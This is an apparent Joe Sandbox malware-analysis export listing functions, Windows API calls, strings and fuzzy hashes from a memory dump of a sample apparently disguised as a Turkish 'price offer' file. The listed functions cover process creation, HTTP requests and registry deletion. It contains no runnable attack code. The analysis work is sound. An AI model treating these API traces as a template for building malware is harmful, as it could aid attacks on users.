Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: df6ca60e63449e9f16512e1a5675848eae6f37ce848e493ad447c8001ccb9405
Instruction ID: c67c96214d949c7c6015cdd033d655eac907bfb4a2df55ff2156b530333ac2b9
Opcode Fuzzy Hash: df6ca60e63449e9f16512e1a5675848eae6f37ce848e493ad447c8001ccb9405
Instruction Fuzzy Hash: A3718E31900B49AFDB21DFA9CE85BAEBBF9FF48718F154918E142A25A0D774ED40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009FFE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 009FFE27
LoadCursorW.USER32(00000000,00007F8A), ref: 009FFE32
LoadCursorW.USER32(00000000,00007F00), ref: 009FFE3D
LoadCursorW.USER32(00000000,00007F03), ref: 009FFE48
LoadCursorW.USER32(00000000,00007F8B), ref: 009FFE53
LoadCursorW.USER32(00000000,00007F01), ref: 009FFE5E
LoadCursorW.USER32(00000000,00007F81), ref: 009FFE69
LoadCursorW.USER32(00000000,00007F88), ref: 009FFE74
LoadCursorW.USER32(00000000,00007F80), ref: 009FFE7F
LoadCursorW.USER32(00000000,00007F86), ref: 009FFE8A
LoadCursorW.USER32(00000000,00007F83), ref: 009FFE95
LoadCursorW.USER32(00000000,00007F85), ref: 009FFEA0
LoadCursorW.USER32(00000000,00007F82), ref: 009FFEAB
LoadCursorW.USER32(00000000,00007F84), ref: 009FFEB6
LoadCursorW.USER32(00000000,00007F04), ref: 009FFEC1
LoadCursorW.USER32(00000000,00007F02), ref: 009FFECC
GetCursorInfo.USER32(?), ref: 009FFEDC
GetLastError.KERNEL32 ref: 009FFF1E

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: ce28f154fe6f6c62d2dcecc133d20f2152d89fb4996c7794cadaaf5bd646d1f5
Instruction ID: 31b43dc22d3309460afb55c5185ac07ebff75fb7b22240eb01400e5f87da9b98
Opcode Fuzzy Hash: ce28f154fe6f6c62d2dcecc133d20f2152d89fb4996c7794cadaaf5bd646d1f5
Instruction Fuzzy Hash: 824154B0D443196ADB10DFBA8C85C6EBFE8FF04354B50452AE11DEB281DB789901CF91

Uniqueness

Uniqueness Score: -1.00%

Function 009A00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009A00C6

Part of subcall function 009A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00A5070C,00000FA0,497B1844,?,?,?,?,009C23B3,000000FF), ref: 009A011C
Part of subcall function 009A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009C23B3,000000FF), ref: 009A0127
Part of subcall function 009A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009C23B3,000000FF), ref: 009A0138
Part of subcall function 009A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009A014E
Part of subcall function 009A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009A015C
Part of subcall function 009A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009A016A
Part of subcall function 009A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009A0195
Part of subcall function 009A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009A01A0

___scrt_fastfail.LIBCMT ref: 009A00E7

Part of subcall function 009A00A3: __onexit.LIBCMT ref: 009A00A9

Strings

kernel32.dll, xrefs: 009A0133
SleepConditionVariableCS, xrefs: 009A0154
WakeAllConditionVariable, xrefs: 009A0162
InitializeConditionVariable, xrefs: 009A0148
api-ms-win-core-synch-l1-2-0.dll, xrefs: 009A0122

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 4f0380e06ca61c6754e6edac9b445a3d41b1725f32950a7939377dbb4339376e
Instruction ID: 41cdbffefcc847631c4562ec357996c57b586aa611f25b9f419cfb9032839962
Opcode Fuzzy Hash: 4f0380e06ca61c6754e6edac9b445a3d41b1725f32950a7939377dbb4339376e
Instruction Fuzzy Hash: D821F932A847517FE7109BE4AC16FE977A8FBC6F65F004629F801E7291DB7498018AD0

Uniqueness

Uniqueness Score: -1.00%

Function 009E30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009E318D
_wcslen.LIBCMT ref: 009E31F8

Strings

TEXT, xrefs: 009E347C
CLASS, xrefs: 009E3188, 009E31A5
CLASSNN, xrefs: 009E31F3, 009E3204
INSTANCE, xrefs: 009E3453
REGEXPCLASS, xrefs: 009E3255, 009E3266
NAME, xrefs: 009E3335, 009E3346

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 7aa472b0ef4eca55f71788cb9a5e6129961c9f28dc11187215ea548c16a30574
Instruction ID: 22078005eecb3b474286a7dc5d655f076798ff617b736e431a89561eab68519d
Opcode Fuzzy Hash: 7aa472b0ef4eca55f71788cb9a5e6129961c9f28dc11187215ea548c16a30574
Instruction Fuzzy Hash: 0CE10632A00556ABCB169FB9C449BEEFBB8FF84710F54C529E456E7240EF30AE458790

Uniqueness

Uniqueness Score: -1.00%

Function 009F44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00A1CC08), ref: 009F4527
_wcslen.LIBCMT ref: 009F453B
_wcslen.LIBCMT ref: 009F4599
_wcslen.LIBCMT ref: 009F45F4
_wcslen.LIBCMT ref: 009F463F
_wcslen.LIBCMT ref: 009F46A7

Part of subcall function 0099F9F2: _wcslen.LIBCMT ref: 0099F9FD

GetDriveTypeW.KERNEL32(?,00A46BF0,00000061), ref: 009F4743

Strings

ramdisk, xrefs: 009F46F1
network, xrefs: 009F469D, 009F46A2
removable, xrefs: 009F45EA, 009F45EF
fixed, xrefs: 009F4635, 009F463A
cdrom, xrefs: 009F458F, 009F4594
unknown, xrefs: 009F4708
all, xrefs: 009F4531, 009F4536

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 8b2af43e23c6e062f65d084b39b380b4a52fd19ba01527750d252dca32364cf9
Instruction ID: 409b180829917c44710f4d8bedfc609d1abff39d6c58e967b30dc192193db04f
Opcode Fuzzy Hash: 8b2af43e23c6e062f65d084b39b380b4a52fd19ba01527750d252dca32364cf9
Instruction Fuzzy Hash: 18B1DF316083069BC710EF28C890A7BB7E9AFE6760F50491DF696C7291E734D945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A0AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A0B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B1D4
_wcslen.LIBCMT ref: 00A0B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B236
_wcslen.LIBCMT ref: 00A0B332

Part of subcall function 009F05A7: GetStdHandle.KERNEL32(000000F6), ref: 009F05C6

_wcslen.LIBCMT ref: 00A0B34B
_wcslen.LIBCMT ref: 00A0B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A0B3B6
GetLastError.KERNEL32(00000000), ref: 00A0B407
CloseHandle.KERNEL32(?), ref: 00A0B439
CloseHandle.KERNEL32(00000000), ref: 00A0B44A
CloseHandle.KERNEL32(00000000), ref: 00A0B45C
CloseHandle.KERNEL32(00000000), ref: 00A0B46E
CloseHandle.KERNEL32(?), ref: 00A0B4E3

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: c83918ffac6b163f1fa44c7c8f35de423e3923cb6956229d4dadd65fdbbdcf4e
Instruction ID: 8d177aff2849a32c445e03fc5132898710a54f0871d7ed42cb926a1bf1ac2297
Opcode Fuzzy Hash: c83918ffac6b163f1fa44c7c8f35de423e3923cb6956229d4dadd65fdbbdcf4e
Instruction Fuzzy Hash: FBF19A316183449FCB14EF24D991B6EBBE5AFC5710F18855DF8998B2A2DB31EC40CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0098326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00A51990), ref: 009C2F8D
GetMenuItemCount.USER32(00A51990), ref: 009C303D
GetCursorPos.USER32(?), ref: 009C3081
SetForegroundWindow.USER32(00000000), ref: 009C308A
TrackPopupMenuEx.USER32(00A51990,00000000,?,00000000,00000000,00000000), ref: 009C309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009C30A9

Strings

0, xrefs: 0098327D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: a5a92d7d07ca1b4312323f3a6e51f94557e9c3f16375a5baf463f081bdd996fd
Instruction ID: 6161d4370985228b5561f781d922e3dcfeebe8365610b9675e4eab19a272cfbe
Opcode Fuzzy Hash: a5a92d7d07ca1b4312323f3a6e51f94557e9c3f16375a5baf463f081bdd996fd
Instruction Fuzzy Hash: F0714D31A44205BEEB21DF69CC49FAABF69FF05774F20821AF5246A1D0C7B5AD10C791

Uniqueness

Uniqueness Score: -1.00%

Function 00A16CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00A16DEB

Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A16E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A16E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A16E94
DestroyWindow.USER32(?), ref: 00A16EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 00A16EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A16EFD
GetDesktopWindow.USER32 ref: 00A16F16
GetWindowRect.USER32(00000000), ref: 00A16F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A16F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A16F4D

Part of subcall function 00999944: GetWindowLongW.USER32(?,000000EB), ref: 00999952

Strings

tooltips_class32, xrefs: 00A16E58, 00A16EDD
0, xrefs: 00A16D98

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 77b03485e28f0dec36bce38de1bb935b2eaaed355189c874dbf696518ef460e4
Instruction ID: e534ec83fb99963026870509a5ccf30b2a109850392f5f01cf96a86131442da1
Opcode Fuzzy Hash: 77b03485e28f0dec36bce38de1bb935b2eaaed355189c874dbf696518ef460e4
Instruction Fuzzy Hash: 34716674244340AFDB21CF68D848BBABBE9FB88314F04491DF999C72A1C774A946CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00A1911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2

DragQueryPoint.SHELL32(?,?), ref: 00A19147

Part of subcall function 00A17674: ClientToScreen.USER32(?,?), ref: 00A1769A
Part of subcall function 00A17674: GetWindowRect.USER32(?,?), ref: 00A17710
Part of subcall function 00A17674: PtInRect.USER32(?,?,00A18B89), ref: 00A17720

SendMessageW.USER32(?,000000B0,?,?), ref: 00A191B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A191BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A191DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A19225
SendMessageW.USER32(?,000000B0,?,?), ref: 00A1923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00A19255
SendMessageW.USER32(?,000000B1,?,?), ref: 00A19277
DragFinish.SHELL32(?), ref: 00A1927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A19371

Strings

@GUI_DROPID, xrefs: 00A1929E
@GUI_DRAGFILE, xrefs: 00A19320
@GUI_DRAGID, xrefs: 00A192E9

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 5b35d1d6f7066a145b5a70c5bb20d2d85e020557280c5ce99d2121e60f87c986
Instruction ID: 9656e9119cb0efa76f4c340de36e0f45c807c2fa86e24849d55f6a9ce77f1f65
Opcode Fuzzy Hash: 5b35d1d6f7066a145b5a70c5bb20d2d85e020557280c5ce99d2121e60f87c986
Instruction Fuzzy Hash: 52614A71108301AFD701EFA4DC85EAFBBE9EFC9750F04492DF5A5962A0DB309A49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009FC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009FC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009FC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009FC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009FC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 009FC533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009FC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009FC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009FC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009FC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009FC5F0
InternetCloseHandle.WININET(00000000), ref: 009FC5FB

Strings

, xrefs: 009FC575

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: fe2d3f8453470980b1919ae4b9dca7311e59746fc061c510e2be41e7f0ad22ee
Instruction ID: 32d37b9c6c46165efe6514c14b262a84ad5f2cbecbc4c76b1642f188a949e90f
Opcode Fuzzy Hash: fe2d3f8453470980b1919ae4b9dca7311e59746fc061c510e2be41e7f0ad22ee
Instruction Fuzzy Hash: BC5159B154430DBFDB21DFA0CA88ABB7BBCFB08754F04841AFA4596250DB74E945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00A18592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A185A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A185AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A185BA
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A185C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A185D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A185E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A185E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A185F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00A1FC38,?), ref: 00A18611
GlobalFree.KERNEL32(00000000), ref: 00A18621
GetObjectW.GDI32(?,00000018,?), ref: 00A18641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00A18671
DeleteObject.GDI32(?), ref: 00A18699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A186AF

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: a6a042a4681765429c23574eee500d7cb789e59addf4451b90848477d319d7ac
Instruction ID: 13a71b7f46799832af5cf0a4d23f399fd326185a6909ddb5b41a7f753f9a0458
Opcode Fuzzy Hash: a6a042a4681765429c23574eee500d7cb789e59addf4451b90848477d319d7ac
Instruction Fuzzy Hash: 6E412975640204BFDB11DFA5CC48EEA7BBDEF89761F108058F915EB260DB349942CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009F14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 009F1502
VariantCopy.OLEAUT32(?,?), ref: 009F150B
VariantClear.OLEAUT32(?), ref: 009F1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009F15FB
VarR8FromDec.OLEAUT32(?,?), ref: 009F1657
VariantInit.OLEAUT32(?), ref: 009F1708
SysFreeString.OLEAUT32(?), ref: 009F178C
VariantClear.OLEAUT32(?), ref: 009F17D8
VariantClear.OLEAUT32(?), ref: 009F17E7
VariantInit.OLEAUT32(00000000), ref: 009F1823

Strings

Default, xrefs: 009F16AF
%4d%02d%02d%02d%02d%02d, xrefs: 009F1625

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 6ee6f118e56e112197206f9d8f705315d4267c4c7d36f7890d2970b447e72857
Instruction ID: 680e6635f9b96e37847236bd4dd588cfce770bf9a7184c2095f8532fab5e4fbb
Opcode Fuzzy Hash: 6ee6f118e56e112197206f9d8f705315d4267c4c7d36f7890d2970b447e72857
Instruction Fuzzy Hash: 90D1F031A04119EBDF04AF65E884BBDB7B6BF84700F148456FA46AB680DB34DC41DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

Part of subcall function 00A0C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A0B6AE,?,?), ref: 00A0C9B5
Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0C9F1
Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA68
Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0B772
RegDeleteValueW.ADVAPI32(?,?), ref: 00A0B80A
RegCloseKey.ADVAPI32(?), ref: 00A0B87E
RegCloseKey.ADVAPI32(?), ref: 00A0B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A0B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A0B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 00A0B922
FreeLibrary.KERNEL32(00000000), ref: 00A0B983
RegCloseKey.ADVAPI32(00000000), ref: 00A0B994

Strings

advapi32.dll, xrefs: 00A0B8ED
RegDeleteKeyExW, xrefs: 00A0B8FE

Memory Dump Source

